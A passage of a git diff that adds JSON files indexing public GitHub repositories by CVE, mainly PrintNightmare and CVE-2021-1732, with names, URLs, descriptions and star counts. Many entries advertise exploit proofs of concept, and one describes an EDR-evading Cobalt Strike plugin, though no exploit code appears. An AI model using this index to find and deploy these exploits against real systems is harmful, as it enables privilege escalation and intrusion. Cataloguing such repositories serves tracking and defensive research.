+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-05T12:10:43Z",
+ "updated_at": "2023-09-28T11:29:17Z",
+ "pushed_at": "2022-12-27T14:15:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 383165321,
+ "name": "PrintNightmare-LPE",
+ "full_name": "sailay1996\/PrintNightmare-LPE",
+ "owner": {
+ "login": "sailay1996",
+ "id": 16739401,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4",
+ "html_url": "https:\/\/github.com\/sailay1996"
+ },
+ "html_url": "https:\/\/github.com\/sailay1996\/PrintNightmare-LPE",
+ "description": "CVE-2021-1675 (PrintNightmare)",
+ "fork": false,
+ "created_at": "2021-07-05T14:17:03Z",
+ "updated_at": "2024-01-19T21:16:06Z",
+ "pushed_at": "2021-07-05T14:34:34Z",
+ "stargazers_count": 74,
+ "watchers_count": 74,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "local-privilege-escalation",
+ "printnightmare",
+ "windows-exploitation",
+ "windows-privilege-escalation"
+ ],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 74,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 383728669,
+ "name": "PrintNightmare",
+ "full_name": "JumpsecLabs\/PrintNightmare",
+ "owner": {
+ "login": "JumpsecLabs",
+ "id": 49488209,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49488209?v=4",
+ "html_url": "https:\/\/github.com\/JumpsecLabs"
+ },
+ "html_url": "https:\/\/github.com\/JumpsecLabs\/PrintNightmare",
+ "description": "Information on the Windows Spooler vulnerability - CVE-2021-1675; CVE 2021 34527",
+ "fork": false,
+ "created_at": "2021-07-07T08:32:09Z",
+ "updated_at": "2024-04-06T07:27:23Z",
+ "pushed_at": "2021-07-12T09:28:16Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 384183711,
+ "name": "CVE-2021-1675-Yara",
+ "full_name": "bartimusprimed\/CVE-2021-1675-Yara",
+ "owner": {
+ "login": "bartimusprimed",
+ "id": 465079,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/465079?v=4",
+ "html_url": "https:\/\/github.com\/bartimusprimed"
+ },
+ "html_url": "https:\/\/github.com\/bartimusprimed\/CVE-2021-1675-Yara",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-08T16:18:52Z",
+ "updated_at": "2023-09-28T11:29:22Z",
+ "pushed_at": "2021-07-08T16:19:45Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 384854320,
+ "name": "cve-2021-1675",
+ "full_name": "k8gege\/cve-2021-1675",
+ "owner": {
+ "login": "k8gege",
+ "id": 42312878,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4",
+ "html_url": "https:\/\/github.com\/k8gege"
+ },
+ "html_url": "https:\/\/github.com\/k8gege\/cve-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-11T03:48:25Z",
+ "updated_at": "2024-04-24T03:39:35Z",
+ "pushed_at": "2021-07-11T03:49:44Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 385174791,
+ "name": "PrintNightmare-CVE-2021-1675-CVE-2021-34527",
+ "full_name": "galoget\/PrintNightmare-CVE-2021-1675-CVE-2021-34527",
+ "owner": {
+ "login": "galoget",
+ "id": 8353133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4",
+ "html_url": "https:\/\/github.com\/galoget"
+ },
+ "html_url": "https:\/\/github.com\/galoget\/PrintNightmare-CVE-2021-1675-CVE-2021-34527",
+ "description": "CVE-2021-1675 \/ CVE-2021-34527 - PrintNightmare Python, C# and PowerShell Exploits Implementations (LPE & RCE)",
+ "fork": false,
+ "created_at": "2021-07-12T08:18:40Z",
+ "updated_at": "2023-09-28T11:29:28Z",
+ "pushed_at": "2021-07-12T08:35:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 386724774,
+ "name": "Microsoft-CVE-2021-1675",
+ "full_name": "thalpius\/Microsoft-CVE-2021-1675",
+ "owner": {
+ "login": "thalpius",
+ "id": 49958238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49958238?v=4",
+ "html_url": "https:\/\/github.com\/thalpius"
+ },
+ "html_url": "https:\/\/github.com\/thalpius\/Microsoft-CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-16T18:06:05Z",
+ "updated_at": "2024-05-27T19:04:19Z",
+ "pushed_at": "2024-05-27T19:04:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 387202198,
+ "name": "Microsoft-CVE-2021-1675",
+ "full_name": "zha0\/Microsoft-CVE-2021-1675",
+ "owner": {
+ "login": "zha0",
+ "id": 5314165,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5314165?v=4",
+ "html_url": "https:\/\/github.com\/zha0"
+ },
+ "html_url": "https:\/\/github.com\/zha0\/Microsoft-CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-18T15:00:27Z",
+ "updated_at": "2021-12-07T10:08:12Z",
+ "pushed_at": "2021-07-18T14:03:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 387694592,
+ "name": "CVE-2021-1675",
+ "full_name": "Winter3un\/CVE-2021-1675",
+ "owner": {
+ "login": "Winter3un",
+ "id": 12570968,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12570968?v=4",
+ "html_url": "https:\/\/github.com\/Winter3un"
+ },
+ "html_url": "https:\/\/github.com\/Winter3un\/CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-20T06:26:45Z",
+ "updated_at": "2023-09-28T11:29:40Z",
+ "pushed_at": "2021-07-20T06:46:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 388427598,
+ "name": "my-CVE-2021-1675",
+ "full_name": "hahaleyile\/my-CVE-2021-1675",
+ "owner": {
+ "login": "hahaleyile",
+ "id": 38727644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38727644?v=4",
+ "html_url": "https:\/\/github.com\/hahaleyile"
+ },
+ "html_url": "https:\/\/github.com\/hahaleyile\/my-CVE-2021-1675",
+ "description": "see https:\/\/github.com\/cube0x0\/CVE-2021-1675",
+ "fork": false,
+ "created_at": "2021-07-22T10:49:30Z",
+ "updated_at": "2023-09-28T11:29:43Z",
+ "pushed_at": "2021-08-13T15:15:05Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 402035048,
+ "name": "CVE-2021-1675_RDL_LPE",
+ "full_name": "mstxq17\/CVE-2021-1675_RDL_LPE",
+ "owner": {
+ "login": "mstxq17",
+ "id": 29624427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29624427?v=4",
+ "html_url": "https:\/\/github.com\/mstxq17"
+ },
+ "html_url": "https:\/\/github.com\/mstxq17\/CVE-2021-1675_RDL_LPE",
+ "description": "PrintNightMare LPE提权漏洞的CS 反射加载插件。开箱即用、通过内存加载、混淆加载的驱动名称来ByPass Defender\/EDR。",
+ "fork": false,
+ "created_at": "2021-09-01T11:25:04Z",
+ "updated_at": "2024-05-20T06:24:51Z",
+ "pushed_at": "2021-09-01T11:25:22Z",
+ "stargazers_count": 145,
+ "watchers_count": 145,
+ "has_discussions": false,
+ "forks_count": 26,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 26,
+ "watchers": 145,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 410565318,
+ "name": "PrintNightmare",
+ "full_name": "ly4k\/PrintNightmare",
+ "owner": {
+ "login": "ly4k",
+ "id": 53348818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4",
+ "html_url": "https:\/\/github.com\/ly4k"
+ },
+ "html_url": "https:\/\/github.com\/ly4k\/PrintNightmare",
+ "description": "Python implementation for PrintNightmare (CVE-2021-1675 \/ CVE-2021-34527)",
+ "fork": false,
+ "created_at": "2021-09-26T13:53:10Z",
+ "updated_at": "2024-06-17T21:03:24Z",
+ "pushed_at": "2021-10-17T13:29:56Z",
+ "stargazers_count": 177,
+ "watchers_count": 177,
+ "has_discussions": false,
+ "forks_count": 30,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1675",
+ "cve-2021-34527"
+ ],
+ "visibility": "public",
+ "forks": 30,
+ "watchers": 177,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 410658843,
+ "name": "SharpPN",
+ "full_name": "Wra7h\/SharpPN",
+ "owner": {
+ "login": "Wra7h",
+ "id": 60988551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60988551?v=4",
+ "html_url": "https:\/\/github.com\/Wra7h"
+ },
+ "html_url": "https:\/\/github.com\/Wra7h\/SharpPN",
+ "description": "C# PrintNightmare (CVE-2021-1675)",
+ "fork": false,
+ "created_at": "2021-09-26T20:46:23Z",
+ "updated_at": "2024-01-04T07:22:50Z",
+ "pushed_at": "2021-09-26T22:35:07Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 413951914,
+ "name": "CVE-2021-1675-PrintNightmare",
+ "full_name": "OppressionBreedsResistance\/CVE-2021-1675-PrintNightmare",
+ "owner": {
+ "login": "OppressionBreedsResistance",
+ "id": 60150959,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60150959?v=4",
+ "html_url": "https:\/\/github.com\/OppressionBreedsResistance"
+ },
+ "html_url": "https:\/\/github.com\/OppressionBreedsResistance\/CVE-2021-1675-PrintNightmare",
+ "description": "Working PowerShell POC",
+ "fork": false,
+ "created_at": "2021-10-05T19:24:23Z",
+ "updated_at": "2023-09-28T11:32:03Z",
+ "pushed_at": "2021-10-06T21:04:44Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420590964,
+ "name": "CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler",
+ "full_name": "5l1v3r1\/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler",
+ "description": "Temporary mitigation to the CVE-2021-1675. 'Spooler' service-disabled based on time schedule. PowerShell Scripts and Task Scheduler code provided. ",
+ "fork": false,
+ "created_at": "2021-10-24T04:59:15Z",
+ "updated_at": "2021-10-24T04:59:16Z",
+ "pushed_at": "2021-07-05T05:41:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435194981,
+ "name": "NimNightmare",
+ "full_name": "eversinc33\/NimNightmare",
+ "owner": {
+ "login": "eversinc33",
+ "id": 51821028,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51821028?v=4",
+ "html_url": "https:\/\/github.com\/eversinc33"
+ },
+ "html_url": "https:\/\/github.com\/eversinc33\/NimNightmare",
+ "description": "CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)",
+ "fork": false,
+ "created_at": "2021-12-05T14:49:32Z",
+ "updated_at": "2024-04-24T17:28:38Z",
+ "pushed_at": "2021-12-05T14:51:28Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 453589665,
+ "name": "CVE-2021-1675",
+ "full_name": "AndrewTrube\/CVE-2021-1675",
+ "owner": {
+ "login": "AndrewTrube",
+ "id": 53106750,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53106750?v=4",
+ "html_url": "https:\/\/github.com\/AndrewTrube"
+ },
+ "html_url": "https:\/\/github.com\/AndrewTrube\/CVE-2021-1675",
+ "description": "PrintNightmare Local Privilege Escalation ",
+ "fork": false,
+ "created_at": "2022-01-30T04:47:44Z",
+ "updated_at": "2022-05-03T17:03:53Z",
+ "pushed_at": "2022-01-30T04:54:23Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 462124046,
+ "name": "cube0x0-CVE-2021-1675",
+ "full_name": "TheJoyOfHacking\/cube0x0-CVE-2021-1675",
+ "owner": {
+ "login": "TheJoyOfHacking",
+ "id": 99463221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4",
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking"
+ },
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking\/cube0x0-CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-22T03:32:14Z",
+ "updated_at": "2022-02-22T03:32:28Z",
+ "pushed_at": "2022-02-22T03:32:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 462124130,
+ "name": "calebstewart-CVE-2021-1675",
+ "full_name": "TheJoyOfHacking\/calebstewart-CVE-2021-1675",
+ "owner": {
+ "login": "TheJoyOfHacking",
+ "id": 99463221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4",
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking"
+ },
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking\/calebstewart-CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-22T03:32:34Z",
+ "updated_at": "2023-10-31T18:19:03Z",
+ "pushed_at": "2022-02-22T03:32:45Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 557145507,
+ "name": "cve-2021-1675",
+ "full_name": "jj4152\/cve-2021-1675",
+ "owner": {
+ "login": "jj4152",
+ "id": 115718872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115718872?v=4",
+ "html_url": "https:\/\/github.com\/jj4152"
+ },
+ "html_url": "https:\/\/github.com\/jj4152\/cve-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-25T06:47:20Z",
+ "updated_at": "2022-10-25T06:55:39Z",
+ "pushed_at": "2022-11-07T12:26:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 582828686,
+ "name": "PrintNightmare",
+ "full_name": "r1skkam\/PrintNightmare",
+ "owner": {
+ "login": "r1skkam",
+ "id": 58542375,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58542375?v=4",
+ "html_url": "https:\/\/github.com\/r1skkam"
+ },
+ "html_url": "https:\/\/github.com\/r1skkam\/PrintNightmare",
+ "description": "Learn about the vulnerability known as PrintNightmare (CVE-2021-1675) and (CVE-2021-34527)",
+ "fork": false,
+ "created_at": "2022-12-28T01:29:31Z",
+ "updated_at": "2022-12-28T01:29:31Z",
+ "pushed_at": "2022-12-29T10:14:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744694326,
+ "name": "PNCVE-Win10-20H2-Exploit",
+ "full_name": "peckre\/PNCVE-Win10-20H2-Exploit",
+ "owner": {
+ "login": "peckre",
+ "id": 97857297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97857297?v=4",
+ "html_url": "https:\/\/github.com\/peckre"
+ },
+ "html_url": "https:\/\/github.com\/peckre\/PNCVE-Win10-20H2-Exploit",
+ "description": "A one-click script to gain a System privileges command line in Windows 10 20H2 that exploits CVE-2021-1675",
+ "fork": false,
+ "created_at": "2024-01-17T20:22:29Z",
+ "updated_at": "2024-01-17T20:29:40Z",
+ "pushed_at": "2024-01-17T21:51:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 756532685,
+ "name": "CVE-2021-1675-CVE-2021-34527",
+ "full_name": "whoami-chmod777\/CVE-2021-1675-CVE-2021-34527",
+ "owner": {
+ "login": "whoami-chmod777",
+ "id": 33582093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582093?v=4",
+ "html_url": "https:\/\/github.com\/whoami-chmod777"
+ },
+ "html_url": "https:\/\/github.com\/whoami-chmod777\/CVE-2021-1675-CVE-2021-34527",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-12T20:54:51Z",
+ "updated_at": "2024-03-06T16:11:54Z",
+ "pushed_at": "2024-02-12T20:54:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 756534030,
+ "name": "CVE-2021-1675---PrintNightmare-LPE-PowerShell-",
+ "full_name": "whoami-chmod777\/CVE-2021-1675---PrintNightmare-LPE-PowerShell-",
+ "owner": {
+ "login": "whoami-chmod777",
+ "id": 33582093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582093?v=4",
+ "html_url": "https:\/\/github.com\/whoami-chmod777"
+ },
+ "html_url": "https:\/\/github.com\/whoami-chmod777\/CVE-2021-1675---PrintNightmare-LPE-PowerShell-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-12T20:59:08Z",
+ "updated_at": "2024-02-12T20:59:21Z",
+ "pushed_at": "2024-02-12T20:59:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810761849,
+ "name": "Windows_Exploit",
+ "full_name": "0xSs0rZ\/Windows_Exploit",
+ "owner": {
+ "login": "0xSs0rZ",
+ "id": 53834222,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53834222?v=4",
+ "html_url": "https:\/\/github.com\/0xSs0rZ"
+ },
+ "html_url": "https:\/\/github.com\/0xSs0rZ\/Windows_Exploit",
+ "description": "CVE-2021-1675\/CVE-2021-34527 PrintNightmare & CVE-2020-0668",
+ "fork": false,
+ "created_at": "2024-06-05T10:01:18Z",
+ "updated_at": "2024-06-05T10:04:29Z",
+ "pushed_at": "2024-06-05T10:04:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1678.json b/2021/CVE-2021-1678.json
new file mode 100644
index 0000000000..7576429079
--- /dev/null
+++ b/2021/CVE-2021-1678.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 800160544,
+ "name": "RpcAuthnLevelPrivacyEnabled",
+ "full_name": "alvaciroliveira\/RpcAuthnLevelPrivacyEnabled",
+ "owner": {
+ "login": "alvaciroliveira",
+ "id": 129803614,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129803614?v=4",
+ "html_url": "https:\/\/github.com\/alvaciroliveira"
+ },
+ "html_url": "https:\/\/github.com\/alvaciroliveira\/RpcAuthnLevelPrivacyEnabled",
+ "description": "Soluciona a CVE-2021-1678 - RpcAuthnLevelPrivacyEnabled",
+ "fork": false,
+ "created_at": "2024-05-13T20:19:38Z",
+ "updated_at": "2024-06-02T01:46:56Z",
+ "pushed_at": "2024-06-02T01:46:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1699.json b/2021/CVE-2021-1699.json
new file mode 100644
index 0000000000..d070f3e110
--- /dev/null
+++ b/2021/CVE-2021-1699.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 353281089,
+ "name": "CVE-2021-1699",
+ "full_name": "waleedassar\/CVE-2021-1699",
+ "owner": {
+ "login": "waleedassar",
+ "id": 5983995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4",
+ "html_url": "https:\/\/github.com\/waleedassar"
+ },
+ "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-1699",
+ "description": "POC for CVE-2021-1699",
+ "fork": false,
+ "created_at": "2021-03-31T08:22:49Z",
+ "updated_at": "2023-11-06T06:10:08Z",
+ "pushed_at": "2021-03-31T08:29:23Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1732.json b/2021/CVE-2021-1732.json
new file mode 100644
index 0000000000..b8de03d037
--- /dev/null
+++ b/2021/CVE-2021-1732.json
@@ -0,0 +1,392 @@
+[
+ {
+ "id": 344667460,
+ "name": "CVE-2021-1732-Exploit",
+ "full_name": "KaLendsi\/CVE-2021-1732-Exploit",
+ "owner": {
+ "login": "KaLendsi",
+ "id": 68001644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4",
+ "html_url": "https:\/\/github.com\/KaLendsi"
+ },
+ "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-1732-Exploit",
+ "description": "CVE-2021-1732 Exploit",
+ "fork": false,
+ "created_at": "2021-03-05T02:11:10Z",
+ "updated_at": "2024-05-31T12:26:09Z",
+ "pushed_at": "2021-03-05T03:10:26Z",
+ "stargazers_count": 412,
+ "watchers_count": 412,
+ "has_discussions": false,
+ "forks_count": 130,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 130,
+ "watchers": 412,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 345537174,
+ "name": "CVE-2021-1732",
+ "full_name": "k-k-k-k-k\/CVE-2021-1732",
+ "owner": {
+ "login": "k-k-k-k-k",
+ "id": 36893648,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36893648?v=4",
+ "html_url": "https:\/\/github.com\/k-k-k-k-k"
+ },
+ "html_url": "https:\/\/github.com\/k-k-k-k-k\/CVE-2021-1732",
+ "description": "CVE-2021-1732 Microsoft Windows 10 本地提权漏 研究及Poc\/Exploit开发",
+ "fork": false,
+ "created_at": "2021-03-08T05:07:15Z",
+ "updated_at": "2024-06-09T13:48:34Z",
+ "pushed_at": "2021-03-08T11:41:19Z",
+ "stargazers_count": 80,
+ "watchers_count": 80,
+ "has_discussions": false,
+ "forks_count": 27,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 27,
+ "watchers": 80,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 345855407,
+ "name": "CVE-2021-1732-Exploit",
+ "full_name": "oneoy\/CVE-2021-1732-Exploit",
+ "owner": {
+ "login": "oneoy",
+ "id": 38435398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4",
+ "html_url": "https:\/\/github.com\/oneoy"
+ },
+ "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-1732-Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-09T02:13:43Z",
+ "updated_at": "2023-09-28T11:25:37Z",
+ "pushed_at": "2021-03-09T02:13:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 353872268,
+ "name": "CVE-2021-1732_exp",
+ "full_name": "linuxdy\/CVE-2021-1732_exp",
+ "owner": {
+ "login": "linuxdy",
+ "id": 50064309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50064309?v=4",
+ "html_url": "https:\/\/github.com\/linuxdy"
+ },
